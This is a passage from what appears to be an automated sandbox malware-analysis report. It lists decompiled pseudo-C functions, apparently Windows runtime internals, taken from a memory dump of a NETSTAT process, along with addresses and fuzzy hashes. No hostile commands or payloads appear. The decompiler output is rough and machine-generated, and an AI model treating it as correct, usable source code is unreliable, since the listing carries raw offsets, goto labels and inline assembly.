					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E034288F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0339AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x344b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x34484c0;
										if(_t69 >=  *0x34484c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E03429063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0335922A(_t82);
							_t53 = E03377D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E03428B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x34486c0; // 0xb307b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x34486b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x34486bc;
										_t72 = 0x34486b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E03359240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x34486c4;
									_t72 = 0x34486c0;
									L18:
									E03389B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                0x03359100
                0x03359100
                0x03359100
                0x03359100
                0x03359102
                0x03359107
                0x0335910c
                0x03359110
                0x03359115
                0x03359136
                0x03359143
                0x033b37e4
                0x033b37e4
                0x03359149
                0x0335914e
                0x0335914e
                0x03359117
                0x0335911d
                0x00000000
                0x00000000
                0x0335911f
                0x03359125
                0x00000000
                0x03359151
                0x03359158
                0x0335915d
                0x03359161
                0x03359168
                0x033b3715
                0x00000000
                0x0335916e
                0x0335916e
                0x03359175
                0x03359177
                0x0335917e
                0x0335917f
                0x03359182
                0x03359182
                0x03359187
                0x03359187
                0x0335918a
                0x0335918d
                0x0335918f
                0x03359192
                0x03359195
                0x03359198
                0x03359198
                0x03359198
                0x0335919a
                0x00000000
                0x00000000
                0x033b371f
                0x033b3721
                0x033b3727
                0x033b372f
                0x033b3733
                0x033b3735
                0x033b3738
                0x033b373b
                0x033b373d
                0x033b3740
                0x00000000
                0x00000000
                0x033b3746
                0x033b3749
                0x00000000
                0x00000000
                0x033b374f
                0x033b3751
                0x00000000
                0x00000000
                0x033b3757
                0x033b3759
                0x033b375c
                0x033b375c
                0x033b375e
                0x033b375e
                0x033b3761
                0x033b3764
                0x00000000
                0x00000000
                0x033b3766
                0x033b3768
                0x033b37a3
                0x033b37a3
                0x033b37a5
                0x033b37a7
                0x033b37ad
                0x033b37b0
                0x033b37b2
                0x033b37bc
                0x033b37c2
                0x033b37c2
                0x033b37b2
                0x03359187
                0x03359187
                0x0335918a
                0x0335918d
                0x0335918f
                0x03359192
                0x03359195
                0x00000000
                0x03359195
                0x00000000
                0x03359187
                0x033b376a
                0x033b376a
                0x033b376c
                0x033b376c
                0x033b376f
                0x033b3775
                0x00000000
                0x00000000
                0x033b3777
                0x033b3779
                0x00000000
                0x00000000
                0x033b3782
                0x033b3787
                0x033b3789
                0x033b3790
                0x033b3790
                0x033b378b
                0x033b378b
                0x033b378b
                0x033b3792
                0x033b3795
                0x033b3795
                0x033b3798
                0x033b3798
                0x033b379b
                0x033b379b
                0x033591a3
                0x033591a9
                0x033591b0
                0x033591b4
                0x033591b4
                0x033591bb
                0x033591c0
                0x033591c5
                0x033591c7
                0x033b37da
                0x033591cd
                0x033591cd
                0x033591cd
                0x033591d2
                0x033591d5
                0x03359239
                0x03359239
                0x033591d7
                0x033591db
                0x033591e1
                0x033591e7
                0x033591fd
                0x03359203
                0x0335921e
                0x03359223
                0x00000000
                0x03359223
                0x03359205
                0x03359208
                0x0335920c
                0x03359214
                0x03359214
                0x033591e9
                0x033591e9
                0x033591ee
                0x033591f3
                0x033591f3
                0x033591f3
                0x033591e7
                0x00000000
                0x033591db
                0x03359187
                0x03359168

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 318980a38051d4ff4a8b1f907fae86d7792de7e33c2df01427ece61d2581fe93
                • Instruction ID: e33def29288f89c5d077027382264c1bbc74c7c1a4f1304739abb0076971c209
                • Opcode Fuzzy Hash: 318980a38051d4ff4a8b1f907fae86d7792de7e33c2df01427ece61d2581fe93
                • Instruction Fuzzy Hash: B831D879A01768DFDB61DB68C8C8FACBBF5BB48350F1C8199E8056B651C335AA40CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03381DB5 Relevance: .1, Instructions: 87COMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E03381DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0337F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L03374620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0337F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                0x03381dc2
                0x03381dc5
                0x03381dc7
                0x03381dcc
                0x03381dce
                0x03381dd6
                0x03381ddf
                0x03381de0
                0x03381de1
                0x03381de5
                0x03381de8
                0x03381def
                0x03381df0
                0x03381df6
                0x03381df7
                0x03381dfe
                0x03381e1a
                0x00000000
                0x00000000
                0x03381e0b
                0x03381e12
                0x03381e12
                0x03381e00
                0x03381e00
                0x03381e05
                0x03381e1e
                0x03381e23
                0x033c570f
                0x033c5713
                0x00000000
                0x00000000
                0x033c5719
                0x033c5719
                0x03381e2c
                0x03381e2d
                0x03381e2e
                0x03381e2f
                0x03381e31
                0x03381e32
                0x03381e35
                0x03381e3d
                0x033c5723
                0x033c573d
                0x033c573d
                0x00000000
                0x033c5723
                0x03381e49
                0x03381e4e
                0x03381e4e
                0x03381e09
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                • Instruction ID: 27178300305dbf6f753cd34c759730228390ab82a209a8a7d240f9d32b1b0923
                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                • Instruction Fuzzy Hash: 4B217C76A00219EBD721EF99CCC0EAAFBBDFF85640F154055E9059B220D634BE42CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03370050 Relevance: .1, Instructions: 81COMMON
                Download Yara Rule
                C-Code - Quality: 53%
                			E03370050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x344d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E03389ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0339B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E03428A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E03389702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x344b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                0x03370055
                0x0337005d
                0x03370062
                0x0337006c
                0x0337006f
                0x03370074
                0x0337007a
                0x0337007a
                0x03370080
                0x03370080
                0x03370087
                0x0337008d
                0x0337008f
                0x03370093
                0x03370095
                0x0337009b
                0x033700f8
                0x033700fb
                0x033700fc
                0x033700ff
                0x03370108
                0x03370108
                0x033700a2
                0x033700a6
                0x033700b3
                0x033700bc
                0x033700c5
                0x033700ca
                0x033bc01e
                0x00000000
                0x00000000
                0x033bc02d
                0x033700d5
                0x033700d9
                0x033bc03d
                0x033bc046
                0x033bc046
                0x033700df
                0x033700e2
                0x033700ea
                0x033700ef
                0x033700f2
                0x033700f6
                0x03370111
                0x03370117
                0x03370117
                0x00000000
                0x033700f6
                0x033700d0
                0x033700d0
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 50eb85807f0cabcbd9a6a5bda9efa092b1a2eeab095beca75c7d631cb3f2d093
                • Instruction ID: 55358e99bae2b2a7564dacf3340f425884d92c4f1acfbe3b4dbc401059cfe015
                • Opcode Fuzzy Hash: 50eb85807f0cabcbd9a6a5bda9efa092b1a2eeab095beca75c7d631cb3f2d093
                • Instruction Fuzzy Hash: 1D318F35601B04CFD735CF28CC80B96B3E5FF88724F18456DE5969BA90EB39A801CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033D6C0A Relevance: .1, Instructions: 79COMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E033D6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E03377D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x3447b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L03374620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0339F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E03377D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03399AE0();
						_t23 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                0x033d6c0a
                0x033d6c0f
                0x033d6c10
                0x033d6c13
                0x033d6c15
                0x033d6c19
                0x033d6c1c
                0x033d6c21
                0x033d6c28
                0x033d6c3a
                0x033d6c2a
                0x033d6c33
                0x033d6c33
                0x033d6c3f
                0x033d6c48
                0x033d6c4d
                0x033d6c60
                0x033d6c65
                0x033d6c69
                0x033d6c73
                0x033d6c79
                0x033d6c7f
                0x033d6c86
                0x033d6c90
                0x033d6c94
                0x033d6ca6
                0x033d6cb2
                0x033d6cbd
                0x033d6cbd
                0x033d6cc3
                0x033d6cc7
                0x033d6ccb
                0x033d6cd0
                0x033d6cd1
                0x033d6ce2
                0x033d6ce2
                0x033d6c69
                0x033d6ced

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e1920c887c49f615d4cd7a002a952a1f93744a30dac18f8ca48191f72d29e239
                • Instruction ID: 84d6a0f40cd90928446742c927ff44fe9089568fea99a4665dfb9fcfc03a741a
                • Opcode Fuzzy Hash: e1920c887c49f615d4cd7a002a952a1f93744a30dac18f8ca48191f72d29e239
                • Instruction Fuzzy Hash: DB218BB6A00644AFD725DB68D880F6AB7B8FF48744F14006AF904DB791E738ED11CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033990AF Relevance: .1, Instructions: 76COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E033990AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E033AD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0338E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L03374620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0339F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0338A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                0x033990af
                0x033990b8
                0x033990bb
                0x033990bf
                0x033990c2
                0x033990c2
                0x033990c8
                0x033990cb
                0x033990cd
                0x033d14d7
                0x033d14eb
                0x033d14eb
                0x00000000
                0x033d14eb
                0x033d14db
                0x033d14e6
                0x00000000
                0x033d14f2
                0x033d14e8
                0x00000000
                0x033d14e8
                0x033990d8
                0x033990da
                0x033990dd
                0x033990e5
                0x00000000
                0x03399139
                0x033990fa
                0x033990fe
                0x03399142
                0x00000000
                0x03399142
                0x03399104
                0x03399107
                0x0339910b
                0x03399110
                0x03399118
                0x03399147
                0x03399148
                0x0339914f
                0x03399150
                0x03399151
                0x03399152
                0x03399156
                0x0339915d
                0x03399160
                0x03399168
                0x0339916c
                0x033991bc
                0x033991be
                0x00000000
                0x033991be
                0x0339916e
                0x03399173
                0x03399176
                0x00000000
                0x00000000
                0x0339917c
                0x03399180
                0x033991b5
                0x00000000
                0x033991b5
                0x03399182
                0x03399185
                0x03399189
                0x00000000
                0x00000000
                0x0339918e
                0x03399190
                0x03399198
                0x00000000
                0x00000000
                0x033991a0
                0x00000000
                0x033991ad
                0x033991ad
                0x033991b0
                0x033991b1
                0x00000000
                0x03399185
                0x0339911a
                0x0339911c
                0x0339911f
                0x03399125
                0x03399127
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                • Instruction ID: 40c1be2b7cf16a03a67d1b70e208a8940b961d707ffb849cea63db6668a2c9ad
                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                • Instruction Fuzzy Hash: 78218075A00304EFEB20DF59C884A6AF7F8EB48310F15886BE945AB610D330ED40CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03383B7A Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E03383B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x34484c4; // 0x0
				_v12 = 1;
				_v8 =  *0x34484c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x34484c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0339AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0339FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x34484c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x34484c4; // 0x0
					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                0x03383b89
                0x03383b96
                0x03383ba1
                0x03383bab
                0x03383bb5
                0x03383bb9
                0x033c6298
                0x03383bbf
                0x03383bc2
                0x03383bc3
                0x03383bc9
                0x03383bca
                0x03383bcc
                0x03383bcd
                0x03383bd4
                0x03383bd6
                0x03383bdb
                0x03383bea
                0x03383bf7
                0x03383bfb
                0x03383bff
                0x03383c09
                0x03383c0a
                0x03383c0b
                0x03383c0f
                0x03383c14
                0x03383c18
                0x03383c18
                0x03383bfb
                0x03383c1b
                0x03383c30
                0x03383c30
                0x03383c3d

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 82ef26df333277ccdec1aed741047b383acf02634625b6cc0c6d6227277f347d
                • Instruction ID: cd27e4eb2e32735cdd572bfedbcb2209a3de8a4d9f9a30590f11695bbbdeda7c
                • Opcode Fuzzy Hash: 82ef26df333277ccdec1aed741047b383acf02634625b6cc0c6d6227277f347d
                • Instruction Fuzzy Hash: 0921927AA00204EFD710EF58DDC1B6AB7BDFB44718F150169E504AB251D375ED01CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033D6CF0 Relevance: .1, Instructions: 74COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E033D6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E03377D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E03377D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x3335c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0338F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0338F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E033D7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L03372400( &_v52);
								}
								_t21 = L03372400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                0x033d6cfb
                0x033d6d00
                0x033d6d02
                0x033d6d06
                0x033d6d0a
                0x033d6d0e
                0x033d6d19
                0x033d6d2b
                0x033d6d1b
                0x033d6d24
                0x033d6d24
                0x033d6d33
                0x033d6d39
                0x033d6d46
                0x033d6d4f
                0x033d6d61
                0x033d6d51
                0x033d6d5a
                0x033d6d5a
                0x033d6d69
                0x033d6d6b
                0x033d6d6d
                0x033d6d6f
                0x033d6d6f
                0x033d6d74
                0x033d6d79
                0x033d6d7a
                0x033d6d7f
                0x033d6d82
                0x033d6d88
                0x033d6d89
                0x033d6d90
                0x033d6d94
                0x033d6da7
                0x033d6db1
                0x033d6db1
                0x033d6dbb
                0x033d6dbb
                0x033d6d90
                0x033d6d69
                0x033d6d46
                0x033d6dc6

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
